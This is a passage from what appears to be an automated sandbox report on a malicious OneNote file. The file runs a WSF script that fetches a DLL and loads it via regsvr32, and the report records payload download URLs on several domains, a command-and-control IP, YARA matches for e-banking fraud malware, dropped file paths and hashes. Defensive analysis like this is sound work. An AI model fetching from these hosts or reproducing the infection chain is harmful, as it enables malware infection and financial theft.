00000001.00000003.396283294.00000000054D1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.401845274.00000000055E1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.397846612.00000000054F7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.395825240.00000000054CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gomespontes.com.br/logs/pd/
                    Source: wscript.exe, 00000001.00000003.412126322.0000000005A25000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.413424725.0000000005A25000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.420955265.0000000005A25000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.410855988.0000000005A25000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.391922304.0000000005A25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gomespontes.com.br/logs/pd/I
                    Source: wscript.exe, 00000001.00000003.411335660.0000000005141000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gomespontes.com.br/logs/pd/vM
                    Source: 9204E5E0-0B60-432B-8209-3A8845F9936A.0.drString found in binary or memory: https://www.odwebp.svc.ms
                    Source: unknownHTTP traffic detected: POST /ncju/qfgtbvn/ HTTP/1.1Connection: Keep-AliveContent-Length: 0Host: 164.90.222.65
                    Source: unknownDNS traffic detected: queries for: penshorn.org
                    Source: global trafficHTTP traffic detected: GET /admin/Ses8712iGR8du/ HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: penshorn.org
                    Source: global trafficHTTP traffic detected: GET /useragreement/ElKHvb4QIQqSrh6Hqm/ HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: bbvoyage.com
                    Source: global trafficHTTP traffic detected: GET /logs/pd/ HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: www.gomespontes.com.br
                    Source: unknownHTTPS traffic detected: 203.26.41.131:443 -> 192.168.2.4:49698 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 31.31.196.172:443 -> 192.168.2.4:49699 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 186.202.153.5:443 -> 192.168.2.4:49700 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 164.90.222.65:443 -> 192.168.2.4:49707 version: TLS 1.2

                    E-Banking Fraud

                    barindex
                    Source: Yara matchFile source: 00000004.00000002.886622640.0000000001288000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 4.2.regsvr32.exe.1220000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.regsvr32.exe.660000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.regsvr32.exe.660000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.regsvr32.exe.1220000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000004.00000002.886565395.0000000001220000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.390164485.0000000000660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.886899027.0000000001511000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.390216129.0000000000691000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: 00000001.00000003.410172116.000000000594E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: WEBSHELL_asp_generic date = 2021-03-07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, score = a8c63c418609c1c291b3e731ca85ded4b3e0fba83f3489c21a3199173b176a75, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2023-01-06
                    Source: C:\Windows\System32\regsvr32.exeFile created: C:\Windows\system32\APvqE\Jump to behavior
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800068183_2_0000000180006818
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000B8783_2_000000018000B878
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800071103_2_0000000180007110
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180008D283_2_0000000180008D28
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800145553_2_0000000180014555
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_006500003_2_00650000
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_006AA0003_2_006AA000
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0069CC143_2_0069CC14
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_006A709C3_2_006A709C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00697D6C3_2_00697D6C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0069263C3_2_0069263C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00698BC83_2_00698BC8
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_006A8FC83_2_006A8FC8
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_006AB4603_2_006AB460
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00692C783_2_00692C78
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0069C0783_2_0069C078
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0069B07C3_2_0069B07C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_006A6C703_2_006A6C70
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0069D4743_2_0069D474
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_006AC44C3_2_006AC44C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_006978403_2_00697840
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_006AC0583_2_006AC058
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_006B54503_2_006B5450
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0069B83C3_2_0069B83C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_006A10303_2_006A1030
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_006AEC303_2_006AEC30
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_006994083_2_00699408
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00697C083_2_00697C08
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_006910003_2_00691000
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_006B181C3_2_006B181C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_006A20E03_2_006A20E0
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_006990F83_2_006990F8
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_006948FC3_2_006948FC
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00693CF43_2_00693CF4
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_006980CC3_2_006980CC
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_006A08CC3_2_006A08CC
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0069F8C43_2_0069F8C4
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_006A5CC43_2_006A5CC4
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_006918DC3_2_006918DC
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_006914D43_2_006914D4
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_006A3CD43_2_006A3CD4
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_006998AC3_2_006998AC
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0069DCB83_2_0069DCB8
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_006B94BC3_2_006B94BC
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_006AA8B03_2_006AA8B0
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_006A58803_2_006A5880
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00694C843_2_00694C84
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_006ACC843_2_006ACC84
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0069AC943_2_0069AC94
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_006AAD283_2_006AAD28
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_006A4D203_2_006A4D20
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_006A19243_2_006A1924
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_006961383_2_00696138
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_006975303_2_00697530
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_006AB1303_2_006AB130
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_006A610C3_2_006A610C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_006B85003_2_006B8500
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_006A75183_2_006A7518
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_006B99103_2_006B9910
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_006AD5F03_2_006AD5F0
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_006A15C83_2_006A15C8
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_006ABDA03_2_006ABDA0
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_006995BC3_2_006995BC
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0069A6603_2_0069A660
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_006A0A703_2_006A0A70
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_006932743_2_00693274
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_006AA2443_2_006AA244
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0069B2583_2_0069B258
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0069F65C3_2_0069F65C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0069BA2C3_2_0069BA2C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_006A8A2C3_2_006A8A2C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_006A0E2C3_2_006A0E2C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_006A662C3_2_006A662C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_006A8E083_2_006A8E08
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00693E0C3_2_00693E0C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_006A020C3_2_006A020C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_006A5A003_2_006A5A00
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_006B8A003_2_006B8A00
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0069461C3_2_0069461C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_006942143_2_00694214
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_006992F03_2_006992F0
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0069D6CC3_2_0069D6CC
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_006AEAC03_2_006AEAC0
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_006A96D43_2_006A96D4
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0069AAB83_2_0069AAB8
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00694EB83_2_00694EB8
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00693ABC3_2_00693ABC
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_006AA6BC3_2_006AA6BC
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00698A8C3_2_00698A8C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_006B4E8C3_2_006B4E8C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0069BE903_2_0069BE90
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_006A4A903_2_006A4A90
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_006983783_2_00698378
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0069F77C3_2_0069F77C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_006AD7703_2_006AD770
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_006ACF703_2_006ACF70
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_006947583_2_00694758
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0069975C3_2_0069975C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_006AE7503_2_006AE750
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0069D33C3_2_0069D33C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_006A4F183_2_006A4F18
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_006AE3103_2_006AE310
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0069EF143_2_0069EF14
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_006A3B143_2_006A3B14
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_006B27EC3_2_006B27EC
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0069A7F03_2_0069A7F0
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_006A97CC3_2_006A97CC
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_006A3FD03_2_006A3FD0
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00692FD43_2_00692FD4
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_006933D43_2_006933D4
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0069DBA03_2_0069DBA0
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0069FFB83_2_0069FFB8
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_006A8BB83_2_006A8BB8
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00698FB03_2_00698FB0
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_006A53843_2_006A5384
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00691B943_2_00691B94
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_012100004_2_01210000
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_01517D6C4_2_01517D6C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0151CC144_2_0151CC14
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0151640A4_2_0151640A
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_015208CC4_2_015208CC
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_01519B794_2_01519B79
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_01523FD04_2_01523FD0
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_01518BC84_2_01518BC8
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_01528FC84_2_01528FC8
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_015163F44_2_015163F4
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_015373A44_2_015373A4
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_01516E424_2_01516E42
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_015306184_2_01530618
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_01534D644_2_01534D64
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_015399104_2_01539910
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_015275184_2_01527518
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_015385004_2_01538500
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_015321004_2_01532100
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0152610C4_2_0152610C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0152B1304_2_0152B130
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_015161384_2_01516138
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_01524D204_2_01524D20
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_015219244_2_01521924
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0152AD284_2_0152AD28
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_015215C84_2_015215C8
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0152D5F04_2_0152D5F0
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_015195BC4_2_015195BC
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0152BDA04_2_0152BDA0
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_015354504_2_01535450
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0152C0584_2_0152C058
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_015178404_2_01517840
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0152C44C4_2_0152C44C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_01526C704_2_01526C70
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0151D4744_2_0151D474
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_01512C784_2_01512C78
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0151C0784_2_0151C078
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0151B07C4_2_0151B07C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0152B4604_2_0152B460
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_015358684_2_01535868
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_015174104_2_01517410
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0153181C4_2_0153181C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_015110004_2_01511000
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0152A0004_2_0152A000
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_01517C084_2_01517C08
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_015194084_2_01519408
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_015210304_2_01521030
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0152EC304_2_0152EC30
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0151B83C4_2_0151B83C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_015114D44_2_015114D4
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_01523CD44_2_01523CD4
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_01531CD44_2_01531CD4
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_015118DC4_2_015118DC
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0151F8C44_2_0151F8C4
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_01525CC44_2_01525CC4
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_015180CC4_2_015180CC
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_01513CF44_2_01513CF4
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_015190F84_2_015190F8
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_015148FC4_2_015148FC
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_015220E04_2_015220E0
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0151AC944_2_0151AC94
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_015314944_2_01531494
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0152709C4_2_0152709C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_015258804_2_01525880
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_01514C844_2_01514C84
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0152CC844_2_0152CC84
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0153488C4_2_0153488C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0152A8B04_2_0152A8B0
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0151DCB84_2_0151DCB8
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_015394BC4_2_015394BC
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_015344A84_2_015344A8
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_015198AC4_2_015198AC
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0152E7504_2_0152E750
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_015147584_2_01514758
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0151975C4_2_0151975C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0152D7704_2_0152D770
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0152CF704_2_0152CF70
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_015183784_2_01518378
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0151F77C4_2_0151F77C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_01538B684_2_01538B68
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0152E3104_2_0152E310
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_015383104_2_01538310
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0151EF144_2_0151EF14
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_01523B144_2_01523B14
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_01524F184_2_01524F18
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_01535B1C4_2_01535B1C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0151D33C4_2_0151D33C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_01512FD44_2_01512FD4
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_015133D44_2_015133D4
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_015297CC4_2_015297CC
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0151A7F04_2_0151A7F0
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0152FFFC4_2_0152FFFC
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_015327EC4_2_015327EC
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_01511B944_2_01511B94
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0152779A4_2_0152779A
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_015253844_2_01525384
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_01518FB04_2_01518FB0
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0151FFB84_2_0151FFB8
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_01528BB84_2_01528BB8
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0151DBA04_2_0151DBA0
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_015347A84_2_015347A8
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0151B2584_2_0151B258
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0151F65C4_2_0151F65C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0152A2444_2_0152A244
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_01536E484_2_01536E48
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_01520A704_2_01520A70
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_015132744_2_01513274
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0151A6604_2_0151A660
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_015142144_2_01514214
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0151461C4_2_0151461C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_01525A004_2_01525A00
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_01538A004_2_01538A00
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_01528E084_2_01528E08
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_01513E0C4_2_01513E0C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0152020C4_2_0152020C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0151263C4_2_0151263C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0151BA2C4_2_0151BA2C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_01528A2C4_2_01528A2C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_01520E2C4_2_01520E2C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0152662C4_2_0152662C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_015296D44_2_015296D4
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0152EAC04_2_0152EAC0
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0151D6CC4_2_0151D6CC
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_015192F04_2_015192F0
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_015336FC4_2_015336FC
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0151BE904_2_0151BE90
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_01524A904_2_01524A90
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_01532E844_2_01532E84
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_01518A8C4_2_01518A8C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_01534E8C4_2_01534E8C
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_01532AB04_2_01532AB0
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0151AAB84_2_0151AAB8
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_01514EB84_2_01514EB8
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_01527EBE4_2_01527EBE
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_01513ABC4_2_01513ABC
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0152A6BC4_2_0152A6BC
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180010C10 LdrFindResource_U,LdrAccessResource,NtAllocateVirtualMemory,3_2_0000000180010C10
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180010AC0 ExitProcess,RtlQueueApcWow64Thread,NtTestAlert,3_2_0000000180010AC0
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180010DB0 ZwOpenSymbolicLinkObject,ZwOpenSymbolicLinkObject,3_2_0000000180010DB0
                    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
                    Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dllJump to behavior
                    Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dllJump to behavior
                    Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\rad69C50.tmp.dll 2F39C2879989DDD7F9ECF52B6232598E5595F8BF367846FF188C9DFBF1251253
                    Source: 8846_0.oneReversingLabs: Detection: 41%
                    Source: 8846_0.oneVirustotal: Detection: 55%
                    Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
                    Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE" "C:\Users\user\Desktop\8846_0.one
                    Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess created: C:\Windows\SysWOW64\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Local\Temp\click.wsf"
                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\System32\regsvr32.exe" "C:\Users\user\AppData\Local\Temp\rad69C50.tmp.dll
                    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe "C:\Users\user\AppData\Local\Temp\rad69C50.tmp.dll"
                    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\APvqE\xukoZN.dll"
                    Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess created: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXE /tsr
                    Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess created: C:\Windows\SysWOW64\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Local\Temp\click.wsf"Jump to behavior
                    Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess created: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXE /tsrJump to behavior
